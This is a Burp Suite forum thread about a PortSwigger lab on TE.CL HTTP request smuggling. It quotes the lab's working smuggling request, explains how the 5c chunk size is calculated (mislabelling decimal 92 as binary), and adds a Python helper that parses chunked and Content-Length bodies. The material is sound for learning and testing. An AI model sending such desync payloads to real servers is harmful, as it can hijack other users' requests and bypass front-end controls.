Burp Suite User Forum


Lab: HTTP request smuggling, basic TE.CL vulnerability

Sidharthan | Last updated: Oct 20, 2020 09:02AM UTC

The solution for the challenge provided is:

    POST / HTTP/1.1
    Host: your-lab-id.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-length: 4
    Transfer-Encoding: chunked

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1
    0

How was the value 5c calculated? And how do I calculate it when I am sending different content?

Ben, PortSwigger Agent | Last updated: Oct 22, 2020 07:38AM UTC

Hi, 5c is the size of the first chunk in bytes expressed as hexadecimal; this in binary is 92. The size of the following text is 92 bytes (the > at the end represents the carriage return to finish the chunk at the start of the next line, which contains 0, which is the size of the next chunk in bytes):

    5c
    GPOST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    x=1 >

This is why 5c is used here.
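
The chunk-size calculation discussed above, as an added example that is not part of the original thread: it counts the chunk data with CRLF line endings, then reads the same body once by Transfer-Encoding and once by Content-Length to show where the two servers in a TE.CL setup disagree. The function names are hypothetical, and the request bytes are reconstructed from the lab solution quoted in the question.

```python
# Added example: chunk-size arithmetic for the request discussed in this thread.
CRLF = b"\r\n"

# The chunk data from the thread as it travels on the wire. HTTP/1.1 ends each
# line with CRLF, so every line break below counts as two bytes.
INNER = CRLF.join([
    b"GPOST / HTTP/1.1",
    b"Content-Type: application/x-www-form-urlencoded",
    b"Content-Length: 15",
    b"",
    b"x=1",
])

def chunk_size_hex(data: bytes) -> str:
    """Value for the chunk-size line: byte length of the data in hex, no prefix."""
    return format(len(data), "x")

def encode_chunked(data: bytes) -> bytes:
    """One data chunk followed by the terminating zero-length chunk."""
    return chunk_size_hex(data).encode() + CRLF + data + CRLF + b"0" + CRLF + CRLF

def decode_chunked(body: bytes) -> tuple[list[bytes], bytes]:
    """Read the body the way a server honouring Transfer-Encoding does.
    Returns the chunks and any bytes left after the final chunk.
    Chunk extensions are ignored; trailer fields are not supported."""
    chunks, pos = [], 0
    while True:
        eol = body.index(CRLF, pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        start, end = eol + 2, eol + 2 + size
        if body[end:end + 2] != CRLF:
            raise ValueError(f"chunk size {size:x} does not match the data")
        if size == 0:
            return chunks, body[end + 2:]
        chunks.append(body[start:end])
        pos = end + 2

def read_by_content_length(body: bytes, length: int) -> tuple[bytes, bytes]:
    """Read the body the way a server honouring Content-Length does."""
    return body[:length], body[length:]

if __name__ == "__main__":
    body = encode_chunked(INNER)
    print(len(INNER), chunk_size_hex(INNER))
    print(decode_chunked(body))
    print(read_by_content_length(body, 4))
```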

Sidharthan | Last updated: Oct 22, 2020 08:03AM UTC

Thanks, Ben, for the explanation; it cleared my doubt. Is the "encode as" "Hex" option available in Burp Decoder meant for this conversion? Also, does the Hackvertor extender support byte-to-hex conversion?

Ben, PortSwigger Agent | Last updated: Oct 23, 2020 08:55AM UTC

Hi, yes, you can use the Burp Decoder to perform various types of encoding and decoding.
